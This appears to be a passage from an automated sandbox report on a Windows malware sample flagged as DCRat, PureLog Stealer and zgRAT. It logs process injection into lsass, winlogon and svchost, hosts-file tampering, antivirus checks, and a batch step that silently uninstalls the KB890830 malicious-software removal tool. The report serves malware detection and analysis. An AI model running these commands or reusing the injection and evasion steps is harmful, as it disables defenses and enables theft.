Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BCF4530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B0BB950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 150E9040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 267FCE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\PING.EXE base: 2359B4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: C350000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

Thread register set: target process: 7964

Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF190000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BFFC960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBA3250000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D4C2220000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F2989C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BCF4530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B0BB950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 13C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 150E9040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 267FCE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\PING.EXE base: 2359B4F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1360000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

0_2_00007FF7F4D7ECA0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D98DB0 cpuid

0_2_00007FF7F4D98DB0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		0_2_00007FF7F4D7DE04
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		1_2_00D6AF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Queries volume information: C:\PerfDll\hyperProviderSavesinto.exe VolumeInformation	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

0_2_00007FF7F4D83FCC

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D66768 GetVersionExW,

0_2_00007FF7F4D66768

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
